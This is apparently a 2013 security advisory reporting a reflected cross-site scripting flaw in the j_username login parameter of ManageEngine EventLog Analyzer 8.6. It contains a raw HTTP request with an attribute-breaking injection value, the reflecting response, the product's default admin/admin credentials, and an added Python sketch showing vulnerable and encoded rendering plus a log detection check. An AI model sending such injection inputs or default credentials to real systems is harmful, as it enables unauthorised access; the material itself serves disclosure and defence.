================================================================================================================================================================
ManageEngine EventLog Analyzer 8.6 cross-site scripting (XSS) Vulnerability
================================================================================================================================================================

#Date- 12/12/2013
# code by Asheesh kumar Mani Tripathi
# Credit by Asheesh Anaconda

#Vulnerability
ManageEngine EventLog Analyzer 8.6 is prone to a cross-site scripting (XSS) vulnerability because the application fails to properly sanitize user-supplied input: the value of the j_username login parameter is reflected into the login page without output encoding.

#Impact
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities.

========================================================================================================================
Request
========================================================================================================================
GET /event/j_security_check?forChecking=null&j_username=aad307">509283f38eba1c193&j_password=a&domains=Choose&loginButton=Login&optionValue=hide HTTP/1.1
Host: 172.28.154.78:8400
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://172.28.154.78:8400/event/index3.do
Cookie: panelState=expanded; calselection=custom; tooltipDiv=block; JSESSIONID=946D162CF15C188883BA1750E38F7A7B
Connection: keep-alive

========================================================================================================================
Response
========================================================================================================================
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
isLoginPage: true
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 17 Dec 2013 19:36:08 GMT
Content-Length: 17880

ManageEngine EventLog Analyzer 8

Sign In here

509283f38eba1c193]">
First time users use 'admin' / 'admin' to login
Unlock the Real Value of your Machine Generated Logs
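The response above shows the marker string landing in the page body after the `">` that closed the attribute it was reflected into. The following Python, added here as an example and not part of the advisory or the vendor's code, models that attribute-context reflection with the advisory's own request line: a vulnerable renderer beside an output-encoded one, plus a log check that flags j_username values carrying markup characters. The function names and the `<input>` markup are assumptions; the real page template is not shown on the page.

```python
import html
from urllib.parse import urlsplit, parse_qs

# Request line copied from the advisory; the j_username value is the tester's harmless marker.
REQUEST_LINE = (
    'GET /event/j_security_check?forChecking=null&j_username=aad307">509283f38eba1c193'
    '&j_password=a&domains=Choose&loginButton=Login&optionValue=hide HTTP/1.1'
)

def username_from_request_line(line: str) -> str:
    """Extract j_username from a raw HTTP request line (hypothetical helper)."""
    target = line.split(" ", 2)[1]
    return parse_qs(urlsplit(target).query).get("j_username", [""])[0]

def render_login_vulnerable(username: str) -> str:
    """Models the observed behaviour: the submitted value is reflected into the
    login form's value attribute with no encoding, so a double quote ends the
    attribute and everything after it becomes markup."""
    return f'<input type="text" name="j_username" value="{username}">'

def render_login_fixed(username: str) -> str:
    """Hardened form: HTML-attribute-encode before reflecting. quote=True turns
    the double quote into &quot; so the value can no longer close the attribute."""
    return f'<input type="text" name="j_username" value="{html.escape(username, quote=True)}">'

def attribute_intact(markup: str) -> bool:
    """True when the reflected value stayed inside value="...": the rendered tag
    then contains exactly one '">' sequence (the attribute's own terminator)."""
    return markup.count('">') == 1

def flag_login_request(line: str) -> bool:
    """Detection hint for web-server or proxy logs: a j_username that carries
    characters with HTML meaning is worth alerting on for this endpoint."""
    value = username_from_request_line(line)
    return any(ch in value for ch in '<>"\'')

if __name__ == "__main__":
    name = username_from_request_line(REQUEST_LINE)
    print("vulnerable intact:", attribute_intact(render_login_vulnerable(name)))  # False
    print("fixed intact:     ", attribute_intact(render_login_fixed(name)))       # True
    print("flagged:          ", flag_login_request(REQUEST_LINE))                  # True
```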